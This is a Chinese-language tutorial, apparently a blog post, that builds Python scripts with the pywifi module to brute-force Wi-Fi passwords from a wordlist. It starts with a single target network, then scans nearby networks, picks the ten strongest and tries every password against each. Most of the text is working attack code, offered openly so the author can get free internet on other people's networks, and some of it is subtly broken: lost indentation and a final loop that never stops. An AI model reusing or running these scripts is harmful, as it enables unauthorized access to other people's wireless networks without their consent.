0x00 前言

如何让自己有网吧？，对对对，就是这样....

如果一个搞web安全的，没有网，跟咸鱼有什么区别.....所以就有了本篇文章

0x01 Pywifi模块简单介绍

用一个连WiFi的例子，概括他的大概用法吧...

#-*- coding: UTF-8 -*-
import pywifi
from pywifi import const #引用一些定义
 
profile = pywifi.Profile() #创建wifi连接文件
profile.ssid = '*****' #定义wifissid
profile.auth = const.AUTH_ALG_OPEN #网卡的开放
profile.akm.append(const.AKM_TYPE_WPA2PSK) #wifi加密算法
profile.cipher = const.CIPHER_TYPE_CCMP #加密单元
profile.key = '*****' #wifi密码
 
wifi = pywifi.PyWiFi() #抓取网卡接口
iface = wifi.interfaces()[0] #获取网卡
profile = iface.add_network_profile(profile) #加载配置文件
iface.connect(profile) #连接wifi

0x02 WIFI破解

一、对单一的目标破解

也许没表达对，我的意思呢，就是只对一个目标进行破解........

#-*- coding: UTF-8 -*-
import pywifi
from pywifi import const #引用一些定义
import time
def testwifi(password):
 wifi=pywifi.PyWiFi()#抓取网卡接口
 ifaces=wifi.interfaces()[0]#获取网卡
 ifaces.disconnect()#断开无限网卡连接
 
 profile=pywifi.Profile()#创建wifi连接文件
 profile.ssid="*******"#定义wifissid
 profile.auth=const.AUTH_ALG_OPEN#网卡的开放
 profile.akm.append(const.AKM_TYPE_WPA2PSK)#wifi加密算法
 profile.cipher=const.CIPHER_TYPE_CCMP##加密单元
 profile.key=password #wifi密码
 
 ifaces.remove_all_network_profiles()#删除其他所有配置文件
 tmp_profile=ifaces.add_network_profile(profile)#加载配置文件
 
 ifaces.connect(tmp_profile)#连接wifi
 time.sleep(5)#5秒内能否连接上
 if ifaces.status()==const.IFACE_CONNECTED:
 print "[-]WiFi connection success!"
 else:
 print "[-]WiFi connection failure!"
 
 ifaces.disconnect()#断开连接
 time.sleep(1)
 
 return True
def main():
 print " ____ _ __ _____ _____ ___ "
 print " / ___|_ __ __ _ ___| | _  / /_ _| ___|_ _|"
 print "| | | '__/ _` |/ __| |/ /  / / / | || |_ | | "
 print "| |___| | | (_| | (__| <  V V / | || _| | | "
 print " ____|_| __,_|___|_|_ _/_/ |___|_| |___|"
 path=r"password.txt"
 files=open(path,'r')
 while True:
 f=files.readline()
 if not f:
 break
 f = f[:-1] 
 testwifi(f)
 print "[-]Current password:",f
 files.close()
if __name__ == '__main__':
 main()

二、实现对附近WiFi扫描并破解目标：扫描信号前十的WIFI并实现破解

分步实现吧，先实现抓取ssidname，然后在加上信号强度

#-*- coding: UTF-8 -*-
import pywifi
from pywifi import const #引用一些定义
def getwifi():
 wifi=pywifi.PyWiFi()#抓取网卡接口
 ifaces=wifi.interfaces()[0]#获取网卡
 ifaces.scan()
 bessis = ifaces.scan_results()
 list = []
 for data in bessis:
 list.append((data.ssid, data.signal))
 return len(list), sorted(list, key=lambda st: st[1], reverse=True)
 
if __name__ == '__main__':
 print getwifi()

然后是通过信号强度实现排序，进入top10会进行后续的破解工作...

#-*- coding: UTF-8 -*-
import pywifi
from pywifi import const #引用一些定义
import time
def getwifi():
 wifi=pywifi.PyWiFi()#抓取网卡接口
 ifaces=wifi.interfaces()[0]#获取网卡
 ifaces.scan()
 bessis = ifaces.scan_results()
 list = []
 for data in bessis:
 list.append((data.ssid, data.signal))
 return len(list), sorted(list, key=lambda st: st[1], reverse=True)
def getsignal():
 while True:
 n, data = getwifi()
 time.sleep(1)
 if n is not 0:
 return data[0:10]
if __name__ == '__main__':
 print getsignal()

排完序之后，就是把信号强度去掉，然后获取ssidname

#-*- coding: UTF-8 -*-
import pywifi
from pywifi import const #引用一些定义
import time
def getwifi():
 wifi=pywifi.PyWiFi()#抓取网卡接口
 ifaces=wifi.interfaces()[0]#获取网卡
 ifaces.scan()
 bessis = ifaces.scan_results()
 list = []
 for data in bessis:
 list.append((data.ssid, data.signal))
 return len(list), sorted(list, key=lambda st: st[1], reverse=True)
def getsignal():
 while True:
 n, data = getwifi()
 time.sleep(1)
 if n is not 0:
 return data[0:10]
def ssidnamelist():
 ssidlist = getsignal()
 namelist = []
 for item in ssidlist:
 namelist.append(item[0])
 return namelist
if __name__ == '__main__':
 print ssidnamelist()

之后，就是上面对单个wifi破解的套路了，只需稍微改一下，直接贴代码了

#-*- coding: UTF-8 -*-
import pywifi
from pywifi import const #引用一些定义
import time
def getwifi():
 wifi=pywifi.PyWiFi()#抓取网卡接口
 ifaces=wifi.interfaces()[0]#获取网卡
 ifaces.scan()
 bessis = ifaces.scan_results()
 list = []
 for data in bessis:
 list.append((data.ssid, data.signal))
 return len(list), sorted(list, key=lambda st: st[1], reverse=True)
def getsignal():
 while True:
 n, data = getwifi()
 time.sleep(1)
 if n is not 0:
 return data[0:10]
def ssidnamelist():
 ssidlist = getsignal()
 namelist = []
 for item in ssidlist:
 namelist.append(item[0])
 return namelist
def testwifi(ssidname,password):
 wifi=pywifi.PyWiFi()#抓取网卡接口
 ifaces=wifi.interfaces()[0]#获取网卡
 ifaces.disconnect()#断开无限网卡连接
 
 profile=pywifi.Profile()#创建wifi连接文件
 profile.ssid=ssidname#定义wifissid
 profile.auth=const.AUTH_ALG_OPEN#网卡的开放
 profile.akm.append(const.AKM_TYPE_WPA2PSK)#wifi加密算法
 profile.cipher=const.CIPHER_TYPE_CCMP##加密单元
 profile.key=password #wifi密码
 
 ifaces.remove_all_network_profiles()#删除其他所有配置文件
 tmp_profile=ifaces.add_network_profile(profile)#加载配置文件
 
 ifaces.connect(tmp_profile)#连接wifi
 time.sleep(5)#5秒内能否连接上
 if ifaces.status()==const.IFACE_CONNECTED:
 print "[-]WiFi connection success!"
 else:
 print "[-]WiFi connection failure!"
 
 ifaces.disconnect()#断开连接
 time.sleep(1)
 
 return True
def main():
 print " ____ _ __ _____ _____ ___ "
 print " / ___|_ __ __ _ ___| | _  / /_ _| ___|_ _|"
 print "| | | '__/ _` |/ __| |/ /  / / / | || |_ | | "
 print "| |___| | | (_| | (__| <  V V / | || _| | | "
 print " ____|_| __,_|___|_|_ _/_/ |___|_| |___|"
 path=r"password.txt"
 files=open(path,'r')
 while True:
 f=files.readline()
 for ssidname in ssidnamelist():
 ret=testwifi(ssidname,f)
 print 'Current WIFIname:',ssidname
 print 'Current password:',f
 files.close()
if __name__ == '__main__':
 main()